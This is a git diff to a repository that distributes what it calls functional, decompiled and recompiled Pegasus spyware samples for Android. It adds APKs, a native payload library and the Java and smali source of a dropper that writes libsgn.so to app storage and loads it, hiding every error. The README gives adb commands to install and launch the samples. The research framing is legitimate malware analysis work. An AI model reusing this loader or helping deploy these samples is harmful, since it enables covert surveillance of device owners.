diff --git a/.gitignore b/.gitignore
index fb3b1c5..c9bd1d5 100644
--- a/.gitignore
+++ b/.gitignore
@@ -30,3 +30,4 @@ Temporary Items
.idea/*
**/LOGS
+.DS_Store
diff --git a/README.md b/README.md
index 8eeb956..bef9320 100644
--- a/README.md
+++ b/README.md
@@ -1,9 +1,9 @@
# Pegasus Spyware Samples Decompiled & Recompiled
## Author: Jonathan Scott @jonathandata1
-### CURRENT VERSION 3.0
+### CURRENT VERSION 3.5
## Description:
-### Samples 1-5 are executable and functional. I am still working on cleaning up Sample #6, but most the XML data can be read.
+### Samples 1-5.1 are executable and functional. I am still working on cleaning up Sample #6, but most the XML data can be read.
## Steps To Install & Research The Spyware Samples
@@ -13,23 +13,31 @@
4. launch the apk, example
`adb shell am start com.xxGameAssistant.pao/.SplashActivity`
+## Update: Sample 5.1
+### This sample can be installed as a standalone apk, but you will need to uninstall sample 5.
+`adb uninstall com.network.android `
+
+### Sample 5.1 is also called com.network.android
+
## Samples Included
-| Sample # | Hash |
-|----------|------------------------------------------------------------------|
-| Sample 1 | d257cfde7599f4e20ee08a62053e6b3b936c87d373e6805f0e0c65f1d39ec320 |
-| Sample 2 | cc9517aafb58279091ac17533293edc1 |
-| Sample 3 | bd8cda80aaee3e4a17e9967a1c062ac5c8e4aefd7eaa3362f54044c2c94db52a |
-| Sample 4 | 144778790d4a43a1d93dff6b660a6acb3a6d37a19e6a6f0a6bf1ef47e919648e |
-| Sample 5 | 7c3ad8fec33465fed6563bbfabb5b13d |
-| Sample 6 | 530b4f4d139f3ef987d661b2a9f74f5f |
+| Sample # | Hash |
+|------------|------------------------------------------------------------------|
+| Sample 1 | d257cfde7599f4e20ee08a62053e6b3b936c87d373e6805f0e0c65f1d39ec320 |
+| Sample 2 | cc9517aafb58279091ac17533293edc1 |
+| Sample 3 | bd8cda80aaee3e4a17e9967a1c062ac5c8e4aefd7eaa3362f54044c2c94db52a |
+| Sample 4 | 144778790d4a43a1d93dff6b660a6acb3a6d37a19e6a6f0a6bf1ef47e919648e |
+| Sample 5 | 7c3ad8fec33465fed6563bbfabb5b13d |
+| Sample 5.1 | 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86 |
+| Sample 6 | 530b4f4d139f3ef987d661b2a9f74f5f |
+
## Acknowledgements
### @vxunderground for providing the samples
### @recordedfuture for validation
-
+
diff --git a/pegasus-spyware-decompiled/.DS_Store b/pegasus-spyware-decompiled/.DS_Store
index 934596e..a15af40 100644
Binary files a/pegasus-spyware-decompiled/.DS_Store and b/pegasus-spyware-decompiled/.DS_Store differ
diff --git a/pegasus-spyware-decompiled/sample1/apk/sample1.d.apk b/pegasus-spyware-decompiled/sample1/apk/sample1.d.apk
new file mode 100644
index 0000000..ab721b2
Binary files /dev/null and b/pegasus-spyware-decompiled/sample1/apk/sample1.d.apk differ
diff --git a/pegasus-spyware-decompiled/sample5.1/apk/sample5.1.apk b/pegasus-spyware-decompiled/sample5.1/apk/sample5.1.apk
new file mode 100644
index 0000000..e3f9723
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/apk/sample5.1.apk differ
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/AndroidManifest.xml b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/AndroidManifest.xml
new file mode 100644
index 0000000..423af03
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/AndroidManifest.xml
@@ -0,0 +1,145 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/assets/libsgn.so b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/assets/libsgn.so
new file mode 100644
index 0000000..a65bcb1
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/assets/libsgn.so differ
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/AndroidManifest.xml b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/AndroidManifest.xml
new file mode 100644
index 0000000..ab07e27
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/AndroidManifest.xml differ
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.RSA b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.RSA
new file mode 100644
index 0000000..655ecb2
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.RSA differ
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.SF b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.SF
new file mode 100644
index 0000000..6e65cd2
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.SF
@@ -0,0 +1,13 @@
+Signature-Version: 1.0
+Created-By: 1.0 (Android)
+SHA1-Digest-Manifest: QtP9Wf1dBHcD3j0V1qlmHWE9tCY=
+
+Name: assets/libsgn.so
+SHA1-Digest: EXziNPMuyBvFLQcTuvghn7cP9D4=
+
+Name: AndroidManifest.xml
+SHA1-Digest: u52ZD4iVi9JT9MOZcAal2TGqWwk=
+
+Name: classes.dex
+SHA1-Digest: XbIYdgwDDljsSeLdHQ6NfARfZmE=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/MANIFEST.MF b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/MANIFEST.MF
new file mode 100644
index 0000000..55c5c26
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/MANIFEST.MF
@@ -0,0 +1,12 @@
+Manifest-Version: 1.0
+Created-By: 1.0 (Android)
+
+Name: assets/libsgn.so
+SHA1-Digest: jlkXqWHZ2rv8dMXlxoilUIDgTJA=
+
+Name: AndroidManifest.xml
+SHA1-Digest: LzjAF3wad04BalUStEmhMVUXcqE=
+
+Name: classes.dex
+SHA1-Digest: l7Rkps9BGFD3U4NvGpnf3laUUPo=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/BuildConfig.smali b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/BuildConfig.smali
new file mode 100644
index 0000000..19fdc43
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/BuildConfig.smali
@@ -0,0 +1,19 @@
+.class public final Lcom/network/android/BuildConfig;
+.super Ljava/lang/Object;
+.source "BuildConfig.java"
+
+
+# static fields
+.field public static final DEBUG:Z
+
+
+# direct methods
+.method public constructor ()V
+ .locals 0
+
+ .prologue
+ .line 4
+ invoke-direct {p0}, Ljava/lang/Object;->()V
+
+ return-void
+.end method
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/NetworkMain.smali b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/NetworkMain.smali
new file mode 100644
index 0000000..2f0baf6
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/NetworkMain.smali
@@ -0,0 +1,121 @@
+.class public Lcom/network/android/NetworkMain;
+.super Landroid/app/Activity;
+.source "NetworkMain.java"
+
+
+# direct methods
+.method public constructor ()V
+ .locals 0
+
+ .prologue
+ .line 12
+ invoke-direct {p0}, Landroid/app/Activity;->()V
+
+ return-void
+.end method
+
+
+# virtual methods
+.method protected onCreate(Landroid/os/Bundle;)V
+ .locals 7
+ .param p1, "savedInstanceState" # Landroid/os/Bundle;
+
+ .prologue
+ .line 17
+ invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
+
+ .line 19
+ const-string v2, "/data/data/com.network.android/libsgn.so"
+
+ .line 22
+ .local v2, "libPath":Ljava/lang/String;
+ :try_start_0
+ invoke-virtual {p0}, Lcom/network/android/NetworkMain;->getResources()Landroid/content/res/Resources;
+
+ move-result-object v5
+
+ invoke-virtual {v5}, Landroid/content/res/Resources;->getAssets()Landroid/content/res/AssetManager;
+
+ move-result-object v5
+
+ const-string v6, "libsgn.so"
+
+ invoke-virtual {v5, v6}, Landroid/content/res/AssetManager;->open(Ljava/lang/String;)Ljava/io/InputStream;
+
+ move-result-object v1
+
+ .line 23
+ .local v1, "iS":Ljava/io/InputStream;
+ invoke-virtual {v1}, Ljava/io/InputStream;->available()I
+
+ move-result v5
+
+ new-array v0, v5, [B
+
+ .line 24
+ .local v0, "buffer":[B
+ invoke-virtual {v1, v0}, Ljava/io/InputStream;->read([B)I
+
+ .line 25
+ new-instance v3, Ljava/io/ByteArrayOutputStream;
+
+ invoke-direct {v3}, Ljava/io/ByteArrayOutputStream;->()V
+
+ .line 27
+ .local v3, "oS":Ljava/io/ByteArrayOutputStream;
+ invoke-virtual {v3, v0}, Ljava/io/ByteArrayOutputStream;->write([B)V
+
+ .line 29
+ invoke-virtual {v3}, Ljava/io/ByteArrayOutputStream;->close()V
+
+ .line 30
+ invoke-virtual {v1}, Ljava/io/InputStream;->close()V
+
+ .line 32
+ new-instance v4, Ljava/io/FileOutputStream;
+
+ invoke-direct {v4, v2}, Ljava/io/FileOutputStream;->(Ljava/lang/String;)V
+
+ .line 33
+ .local v4, "outputStream":Ljava/io/OutputStream;
+ invoke-virtual {v3, v4}, Ljava/io/ByteArrayOutputStream;->writeTo(Ljava/io/OutputStream;)V
+
+ .line 34
+ invoke-virtual {v4}, Ljava/io/OutputStream;->close()V
+
+ .line 36
+ invoke-static {v2}, Ljava/lang/System;->load(Ljava/lang/String;)V
+ :try_end_0
+ .catch Ljava/io/IOException; {:try_start_0 .. :try_end_0} :catch_2
+ .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_1
+ .catch Ljava/lang/Throwable; {:try_start_0 .. :try_end_0} :catch_0
+
+ .line 48
+ .end local v0 # "buffer":[B
+ .end local v1 # "iS":Ljava/io/InputStream;
+ .end local v3 # "oS":Ljava/io/ByteArrayOutputStream;
+ .end local v4 # "outputStream":Ljava/io/OutputStream;
+ :goto_0
+ invoke-virtual {p0}, Lcom/network/android/NetworkMain;->finish()V
+
+ .line 49
+ return-void
+
+ .line 45
+ :catch_0
+ move-exception v5
+
+ goto :goto_0
+
+ .line 42
+ :catch_1
+ move-exception v5
+
+ goto :goto_0
+
+ .line 39
+ :catch_2
+ move-exception v5
+
+ goto :goto_0
+.end method
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/AndroidManifest.xml b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/AndroidManifest.xml
new file mode 100644
index 0000000..83bd9fc
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/AndroidManifest.xml
@@ -0,0 +1,145 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.RSA b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.RSA
new file mode 100644
index 0000000..655ecb2
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.RSA differ
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.SF b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.SF
new file mode 100644
index 0000000..6e65cd2
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.SF
@@ -0,0 +1,13 @@
+Signature-Version: 1.0
+Created-By: 1.0 (Android)
+SHA1-Digest-Manifest: QtP9Wf1dBHcD3j0V1qlmHWE9tCY=
+
+Name: assets/libsgn.so
+SHA1-Digest: EXziNPMuyBvFLQcTuvghn7cP9D4=
+
+Name: AndroidManifest.xml
+SHA1-Digest: u52ZD4iVi9JT9MOZcAal2TGqWwk=
+
+Name: classes.dex
+SHA1-Digest: XbIYdgwDDljsSeLdHQ6NfARfZmE=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/MANIFEST.MF b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/MANIFEST.MF
new file mode 100644
index 0000000..55c5c26
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/MANIFEST.MF
@@ -0,0 +1,12 @@
+Manifest-Version: 1.0
+Created-By: 1.0 (Android)
+
+Name: assets/libsgn.so
+SHA1-Digest: jlkXqWHZ2rv8dMXlxoilUIDgTJA=
+
+Name: AndroidManifest.xml
+SHA1-Digest: LzjAF3wad04BalUStEmhMVUXcqE=
+
+Name: classes.dex
+SHA1-Digest: l7Rkps9BGFD3U4NvGpnf3laUUPo=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/assets/libsgn.so b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/assets/libsgn.so
new file mode 100644
index 0000000..a65bcb1
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/assets/libsgn.so differ
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/classes.dex b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/classes.dex
new file mode 100644
index 0000000..1f8a97d
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/classes.dex differ
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/BuildConfig.java b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/BuildConfig.java
new file mode 100644
index 0000000..4d73b93
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/BuildConfig.java
@@ -0,0 +1,5 @@
+package com.network.android;
+/* loaded from: classes.dex */
+public final class BuildConfig {
+ public static final boolean DEBUG = false;
+}
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/NetworkMain.java b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/NetworkMain.java
new file mode 100644
index 0000000..83f0932
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/NetworkMain.java
@@ -0,0 +1,33 @@
+package com.network.android;
+
+import android.app.Activity;
+import android.os.Bundle;
+import java.io.ByteArrayOutputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+/* loaded from: classes.dex */
+public class NetworkMain extends Activity {
+ @Override // android.app.Activity
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ try {
+ InputStream iS = getResources().getAssets().open("libsgn.so");
+ byte[] buffer = new byte[iS.available()];
+ iS.read(buffer);
+ ByteArrayOutputStream oS = new ByteArrayOutputStream();
+ oS.write(buffer);
+ oS.close();
+ iS.close();
+ OutputStream outputStream = new FileOutputStream("/data/data/com.network.android/libsgn.so");
+ oS.writeTo(outputStream);
+ outputStream.close();
+ System.load("/data/data/com.network.android/libsgn.so");
+ } catch (IOException e) {
+ } catch (Exception e2) {
+ } catch (Throwable th) {
+ }
+ finish();
+ }
+}